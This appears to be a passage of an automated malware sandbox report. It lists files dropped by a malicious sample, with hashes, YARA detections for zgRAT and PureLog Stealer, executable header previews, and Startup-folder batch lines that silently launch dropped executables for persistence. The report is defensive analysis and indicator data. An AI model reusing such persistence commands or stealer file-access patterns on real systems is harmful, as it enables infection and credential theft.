                                                                                                                                                                                                                                SHA-256:9B02B30EF27370A05266C1EACECCAA71920A5C08D701E81322FA47C57988A27A
                                                                                                                                                                                                                                SHA-512:3254774F71EC737F40FC0B53EFB7572D8E3516C4E7E7E4BE437289479F0E72B3559A976377C074EAA4F3D94150E58A820C3C1AE741EF2737E43A5F87EE553D73
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\3G30xcq8tfWItduGYVyT9CxK.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zEeQhGslvnDbo67JpIq1JJCf.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):90
                                                                                                                                                                                                                                Entropy (8bit):4.861352336505184
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5XOIzWjupGfFlIkdan:fE1sZ23pzWjuodSD
                                                                                                                                                                                                                                MD5:64895C9465C538741D9246392494B5F2
                                                                                                                                                                                                                                SHA1:A526D0B815CB358E1FCC93B1F14BB5EF251A2836
                                                                                                                                                                                                                                SHA-256:2A64213751014F382926C43C5E2A54629D36CC84888C09C9B7EA8DBB1341FFC3
                                                                                                                                                                                                                                SHA-512:CE5FE8067819BD78E95B60161B0DD25D026BF3582FD1D70280FD39B4139904E38A11494BE71B890C279B7D41A191DAD7698DC0132C70C1786D4BA9F40986E65E
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\ra8RK0HZwqsQsFKuKAOljczn.exe" --silent --allusers=0

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqlite-shm

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\places.sqlite-shm

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\u5v8.0.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                Entropy (8bit):3.3454618442383204
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:FkWXlNLbO07:91bOw
                                                                                                                                                                                                                                MD5:0446077FC9A25ED02FBBD68539B38270
                                                                                                                                                                                                                                SHA1:C370C1EBCE3A461403826E0F3E24243240558CD6
                                                                                                                                                                                                                                SHA-256:F072ACBB8972180D0E47697A75DF16B4C4073448D8D6382961FF35FAB32D6372
                                                                                                                                                                                                                                SHA-512:FAF71834BDB3654B20F1D032471D919688FFB9005F7AB7568E05F2E7BE876360B30821960063DF5C641D8E982F4621F5B556C32C9A3D8DFB0A9B29F51F366DC3
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:sdPC....................)aM..4mD.....Y..

                                                                                                                                                                                                                                C:\Users\user\Documents\SimpleAdobe\0bDSNbGYZjXnI1v06off3DYe.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):6700529
                                                                                                                                                                                                                                Entropy (8bit):7.996136280137261
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:98304:91Ofp2zjJY231tFaCYTlZE1JLFSNGw6eJm5JeHxFKw7/X26jOnCB9XmtPtX4S8Bl:91Oh2zjVpYD8vDwJmaHxbS2Os9qP0eEn
                                                                                                                                                                                                                                MD5:48083F28A764D552C591874EC8255897
                                                                                                                                                                                                                                SHA1:6A6F73D45AA90F751C47BA886DDA6C0F8C7A440A
                                                                                                                                                                                                                                SHA-256:65122561EF77967E63D5F3F5CBE450FF891B3FB47A206E305E838C3B491F7585
                                                                                                                                                                                                                                SHA-512:F62312F2ED7DB1F98C04985135C75D46D86482F2A1C7E457CBE003B35C5D20065EB960FE9A7A0D535380C6CF4CEF48AC0F4FBD46B449C4A470EE6E8BA88559AB
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y..s...,...s...r.!.s.......s...x..s.......s.......s.^.u...s.Rich..s.........PE..L....S.L.............................K............@.............................................................................d....p..`............................................................................................................text.............................. ..`.rdata...D.......F..................@..@.data...HZ.......2..................@....sxdata......`......................@....rsrc...`....p......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\Documents\SimpleAdobe\62dRoO3BlNtGMcLNCSYzZeqJ.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4405112
                                                                                                                                                                                                                                Entropy (8bit):7.969340645756812
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:bjy//HaMA0oZdbKSc0+JUZTVnoWtL+8xpWZFua:LpjD+c6O+8yZ9
                                                                                                                                                                                                                                MD5:093FD75971D1A764AB617DDFF40660B3
                                                                                                                                                                                                                                SHA1:78FDA0ED65D5A7D8E427D63328EBFEA74029368A
                                                                                                                                                                                                                                SHA-256:3651CA232A293D6C0670F30467B5A65D0550E64DF2305ADA9C006B50CCCC6F81
                                                                                                                                                                                                                                SHA-512:E3FCF30E34D9236C6EAC5A6A18DE375A0AF63B1E522C548F735F2CF064CBCCE93DF693E996C7FCE3661291D466EBD5E72392B6FE83601F33852C4940B232F746
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L......e.....................N......O?............@..........................`......L.C.........................................P....................,C.x...............8...............................@............................................text...8........................... ..`.rdata.............................@..@.data.............?.................@....rsrc................vA.............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\Documents\SimpleAdobe\7vjGPpkhw2aAaC2CnZlC02OG.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe
                                                                                                                                                                                                                                File Type:HTML document, Non-ISO extended-ASCII text, with very long lines (17990)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):285182
                                                                                                                                                                                                                                Entropy (8bit):5.13902130764208
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:YMttFywtNnTbN/axRkbGqwyCqszjlNW6fOTHg0mRU0ebgKnIY6/u1:fnF/axR0CqmjlfN0gKnIY6u1
                                                                                                                                                                                                                                MD5:283DCC3A831721109105E1A20699DC2D
                                                                                                                                                                                                                                SHA1:66FAC619246C4CB700EA9E7C897EC629971C3F4A
                                                                                                                                                                                                                                SHA-256:95184D432D08BA0AA5271AA01DAA10DEFDBDECF2294D2CAB0ADA8C3CFFE909ED
                                                                                                                                                                                                                                SHA-512:76DBBA5922F9FD2E83341D7069853E2A9D8CDF007FD61E4F48F76713B72C0792D8A7064A798A4EC41455ED7112A6A88C624381ECF486F94529CA8AC75F856FC6
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang='en' dir='ltr'>.<head>.<meta http-equiv="X-UA-Compatible" content="IE=edge" />..<link rel="shortcut icon" href="/images/icons/favicons/fav_logo.ico?7" />..<link rel="apple-touch-icon" href="/images/icons/pwa/apple/default.png?15">..<meta http-equiv="content-type" content="text/html; charset=windows-1251" />.<meta http-equiv="origin-trial" content="AiJEtxZTdbmRu3zkrD0Bg/GvReuip5r0aklN7tIrw1Yit01/+j7PNlJFAyMMo/vqqNVvDmRsGCPGfVtNn5ookQ8AAABueyJvcmlnaW4iOiJodHRwczovL3ZrLmNvbTo0NDMiLCJmZWF0dXJlIjoiRG9jdW1lbnRQaWN0dXJlSW5QaWN0dXJlQVBJIiwiZXhwaXJ5IjoxNjk0MTMxMTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0="><meta name="theme-color" content="#ffffff">.<meta name="color-scheme" content="light">..<title>Error | VK</title>..<noscript><meta http-equiv="refresh" content="0; URL=/badbrowser.php"></noscript>.<script nomodule>(function(){"use strict";function e({needRedirect:e}){const n=new XMLHttpRequest;n.open("GET","/badbrowser_stat.php?act=nomodule"),n.send(),e&&window.location.replace

                                                                                                                                                                                                                                C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):5077008
                                                                                                                                                                                                                                Entropy (8bit):6.713226173072206
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:AZ5VfUpCCTIDsAi8LXS2vwJ1EbfdOq5elO:Axf8ivmOfdOq5elO
                                                                                                                                                                                                                                MD5:D15459E9B9D12244A57809BC383B2757
                                                                                                                                                                                                                                SHA1:4B41E6B5AA4F88FDF455030DB94197D465DE993A
                                                                                                                                                                                                                                SHA-256:37AEF611EC814AF2CDCFA198E200CB21ECB46CAA30F84D0221A47DB1265B889D
                                                                                                                                                                                                                                SHA-512:40558644CA9918B84A9438A3A2C4D85A97DDEC378AED23756E14C57351D4B4C82D6316ADD1E62243826328E42C766784CEE5D6CAE41C6FA6C43864F5097A239C
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........rs... ... ... ...!... ...!t.. ...!... z". ... z".!.. z".!... z".!... ...!... ... ^.. K!.!... K!. ... ... ... K!.!... Rich... ................PE..L......f...............'.....:........:...........@...........................\.....E.N...@..................................@$......@..._....................\..............................P$..................................................... .........l.................. ..` ~............p..............@..@ ............r..............@....rsrc...._...@...`..................@..@ ......#..R..................@..B.idata.......@$......4..............@....tls.........P$......6...................themida.@8..`$..@8..8..............`....reloc........\......xM................@........................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\Documents\SimpleAdobe\GyEiPhmZ7wFSCYXwTgsPkluJ.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):3713824
                                                                                                                                                                                                                                Entropy (8bit):7.975282960011526
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:Ybp/anKeCturToS0c8u0whmllNBPIoHPbBm0o+:Y7eCOgc8u3hKLiS
                                                                                                                                                                                                                                MD5:4155331E3491440A65ABC55C925C554F
                                                                                                                                                                                                                                SHA1:2BF38138FC9140D6708AC0AEBBCDD509409E798B
                                                                                                                                                                                                                                SHA-256:30C951A5881A9A9E50DCD5C78B69E518BBA55FA16245AD0D422BEF6F20CA2480
                                                                                                                                                                                                                                SHA-512:83C384E2F10D52A934F92498FE2D445053EAC000079C81F99060D34B4A23152D6BC9EEA4464700F38937B48D37A64720939DEBF1098F48F3482156ED96DD8F2F
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...^.%f...............'............*.D...........@..........................Pq......Q9...@...................................o.@....@q.".............8. .... q............................. .f.....`.q.@.............8.......d.@....................text............................... ..`.rdata..Z{..........................@..@.data...0I... ......................@....vmp,,,0[( ..p...................... ..`.vmp,,,1,.....8.....................@....vmp,,,2.d8...8..f8................. ..`.reloc....... q......r8.............@..@.rsrc..."....@q.......8.............@..@................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\Documents\SimpleAdobe\HDCJLf7pYcxae1KSycA6A5eR.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):325120
                                                                                                                                                                                                                                Entropy (8bit):6.52662580847976
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:OU7+A0a8Ga/QpfLEnbp+sQAZXX6Gr+GM1ny3JRQPEM0YPVH0HZ+i01OYKbO5X0CO:QQa/QpGrtO2APEVYPw+3OYc5KqbI
                                                                                                                                                                                                                                MD5:0BAE95163FC9DD6EED4854D33084096F
                                                                                                                                                                                                                                SHA1:985F5CF9D15FC9B859D8C2F7A9607B0824A80B4F
                                                                                                                                                                                                                                SHA-256:65A7B796D7C0DB8377C48FB5388FA149A10C17B5E511C3B5392EF55E0656A220
                                                                                                                                                                                                                                SHA-512:AFE5BFA20DEB38BFEB4A30ECDEF9C71CB8402DA9EF14BAC653C9828F9452E851FD1BEFAA49D4096B7443A3C982C7E6593AEA5256D93820C1116B098186766458
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L......d............................O?............@..........................0..................................................P....p..................................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data...............................@....rsrc........p.......@..............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\Documents\SimpleAdobe\IsEPzSszgrCYUPQvHPDrLyFU.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4405112
                                                                                                                                                                                                                                Entropy (8bit):7.969342371736577
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:bjy//HaMA0oZdbKSc0+JUZTVnoWtL+8xpWZFu9:LpjD+c6O+8yZC
                                                                                                                                                                                                                                MD5:2DCF36A97DEF98F6620110EE495CA26F
                                                                                                                                                                                                                                SHA1:2DB46017FCDD7B616C3563BA475B6CDE88339945
                                                                                                                                                                                                                                SHA-256:B625FA02003D1F41E85DB1243E7E12357A3A1622CBD22BE35B11702A5AD0EAB5
                                                                                                                                                                                                                                SHA-512:E4CFB972D69A9392F9F161F0BA1BB4F8FBBA6DB9FF49A69D68E17F6940996C4D041F52CF71C54C01A15BB3FE1CBAA165961B8C01585F005153FFF4AF5AE8A0C3
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L......e.....................N......O?............@..........................`......L.C.........................................P....................,C.x...............8...............................@............................................text...8........................... ..`.rdata.............................@..@.data.............?.................@....rsrc................vA.............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\Documents\SimpleAdobe\KPGhFRImEtP9uUl6Tmi54GCR.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4069200
                                                                                                                                                                                                                                Entropy (8bit):7.532534042648446
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:MIF8M31NQDgRmeebiQ07intlAEE3sQIcvw4AAVbmVeXQE4aZ+G9/FBiyu7vBHvpT:5lPY/HrAEE3sxfpAV/XQExHULR9RL4Qx
                                                                                                                                                                                                                                MD5:3C244FAE9CB5BB37D4410F4C9D6FE90A
                                                                                                                                                                                                                                SHA1:3E03A9E42B537B793770C4205DB7F4BAC7EC6561
                                                                                                                                                                                                                                SHA-256:AF60EEC4FCC826168F9BB7F849BC24B9C67BC9367126C20B8A80D6B0E1C416C1
                                                                                                                                                                                                                                SHA-512:9408A67B96AC32F8C767B5A8FEBE6C89A1C75EE8666DE237E806AC4F61A0895BC468BE70D4F19B4DA26823226052CBB7D9E0A654311772DB630D0AFE4BD26DE7
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\Documents\SimpleAdobe\KPGhFRImEtP9uUl6Tmi54GCR.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\Documents\SimpleAdobe\KPGhFRImEtP9uUl6Tmi54GCR.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\Documents\SimpleAdobe\KPGhFRImEtP9uUl6Tmi54GCR.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: C:\Users\user\Documents\SimpleAdobe\KPGhFRImEtP9uUl6Tmi54GCR.exe, Author: ditekSHen
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................P..|;..........;.. ....;...@.. ........................=......@>...@...................................;.K.....;...............=.P}....=...................................................... ............... ..H............text....z;.. ...|;................. ..`.rsrc.........;......~;.............@..@.reloc........=.......=.............@..B..................;.....H....... ...d.................0..........................................(....*...(q...*..(....*:..(....8.....*.&~.......*...~....*..0..........81.......E........O...8....s......... .....9....&8....s.........80...s......... .....9....& ....8....s.........8....*s.........8.....0..$.......8......*.~....o......8....8....8.....0...........~....o......8......*8....8......0..$.......8......*8....8.....~....o......8.....0..$.......8......*.~....o......8....8....8.....0...........~..

                                                                                                                                                                                                                                C:\Users\user\Documents\SimpleAdobe\NpXiURSjfclxWgcUlkMD5eJ8.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):325632
                                                                                                                                                                                                                                Entropy (8bit):6.530888500317243
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:e4Dj1lt4JqeVKKPb7g0v7DYO9tJm5cLEac:e4DjHuJJgKz7bv7DHtJGcA
                                                                                                                                                                                                                                MD5:F31F7E2ED3332277AB0CBFB9F5549C66
                                                                                                                                                                                                                                SHA1:C5557FD7AF4EDB876F962B3969D58A5E3A382343
                                                                                                                                                                                                                                SHA-256:D969D8326211676A36B63932F41AEFC276CC3C27EB51C752A2920FA0529A8873
                                                                                                                                                                                                                                SHA-512:D1FBD0D363C6F7FC3A07FEAA573A68F8F2CEC4995B9CD842A6446401AF0FC94D97C6B674406CB44B9E0EE9F920AC1769BB02905020FFA6D7240516CFB8ADCA13
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L....._c............................O?............@..........................0......+}.........................................P....p.. ...............................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data...@...........................@....rsrc... ....p.......@..............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\Documents\SimpleAdobe\PuQVr13ObJzLxhvCkSK1EXB6.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1253376
                                                                                                                                                                                                                                Entropy (8bit):6.493390647712729
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24576:Msxl3hAS7tUhU5M/i8t7avB+eU/SvHNmCftCLRoa:Mi9tUhU5M/y4tSHC
                                                                                                                                                                                                                                MD5:F1662FBB012843190B9AD18C76D0141F
                                                                                                                                                                                                                                SHA1:996D7CA6229CEDBEBDE5A0BF7BB67C635BF7B279
                                                                                                                                                                                                                                SHA-256:D6016D6C87D7F59A478FE33CCFF3A34E86DE50B8700167B161DA920561598669
                                                                                                                                                                                                                                SHA-512:8265CF665BD763CDD30B29086BD6FE51D27F182DB8FD92BB42DBED4C38DD03B2E5460366B107A48DAAB0F10C3C27962A4209D1000F1A1DE8DD2007EAE415697C
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........B............C......C..9...C......R!......R!......C.............R!.....c"......c"......Rich....................PE..L...7.'f...............'..........................@..........................p............@.................................0...P................................I..0m..8...........................Hl..@...............0............................text............................... ..`.rdata...M.......N..................@..@.data...............................@....idata..*...........................@..@.00cfg..............................@..@.reloc...W.......X..................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\Documents\SimpleAdobe\PurfH4hAOpbVHLEkly68a3iu.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):11214848
                                                                                                                                                                                                                                Entropy (8bit):7.97772484802616
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:196608:oPnV1Bk/fRaGxUCBIORz5Z2YoZX0tMmp6tgq1D//XxdgPxwdT:oPKfR/UCBF+dZX0tMft/vxdgpG
                                                                                                                                                                                                                                MD5:B091C4848287BE6601D720997394D453
                                                                                                                                                                                                                                SHA1:9180E34175E1F4644D5FA63227D665B2BE15C75B
                                                                                                                                                                                                                                SHA-256:D0B06CA6ECE3FEF6671FA8ACD3D560A9400891ABCD10F5CEDCFE7BD1E6050DFE
                                                                                                                                                                                                                                SHA-512:A3B3663FD343389AEE2CBF76F426401D436992B2B56CEA3B60E9C2E385510FA874FA45B2AC75703074F0303934C4223EAEE1983851374A2E753FD0302042CC5A
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....L.f..........#.................y..........@.............................@............ ...................................................f.d.......X,..`...*...........................................v..(... ..8...............h............................text....~.......................... ..`.rdata..............................@..@.data...h...........................@....pdata..............................@..@.00cfg..............................@..@.tls................................@....text0...4+......................... ..`.text1..8...........................@....text2..\... .....................`..h.rsrc...X,.........................@..@........................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\Documents\SimpleAdobe\UWxz0MPLJemfxFfuxrp6E5vU.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):3679520
                                                                                                                                                                                                                                Entropy (8bit):7.96983211593779
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:6HEfxU3LTvGAz1P+LRyyt5PvAXZ1FJaxvhVNj7zNzA58do:6kfyGAYtyyteZn0Bt7pz88y
                                                                                                                                                                                                                                MD5:A1789F6DBB08B8F49452DB52D3829002
                                                                                                                                                                                                                                SHA1:7DB5DB6D3767D8FC43D7BBC9AC6412A094DE508C
                                                                                                                                                                                                                                SHA-256:95F7F431C28583499275549466741FC3CD84FEC65FD9BD1A53C7535BF5D6A62A
                                                                                                                                                                                                                                SHA-512:A23715B002E4DABD1C0239714202262BBD9ED74E1113CF801FCF307C820903485C081D3708D4858039CBC2653FBE70015901985F473F1BC2111F1838647E5352
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...^.%f...............'.............tn...........@...........................p.......8...@.................................X.e.@.....p.".............8. ....`p...............................^......Vp.@............p8.......;.@....................text............................... ..`.rdata..Z{..........................@..@.data...0I... ......................@....vmp,,,0.....p...................... ..`.vmp,,,1,....p8.....................@....vmp,,,2p.7...8...7................. ..`.reloc.......`p.......7.............@..@.rsrc...".....p.......8.............@..@................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\Documents\SimpleAdobe\ZJJS5bo63td4EjeR2XP_7oEx.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\9wqoiPpK0NIQEBygxfm6h42G.exe
                                                                                                                                                                                                                                File Type:HTML document, Non-ISO extended-ASCII text, with very long lines (17990)
                                                                                                                                                                                                                                Category:dropped
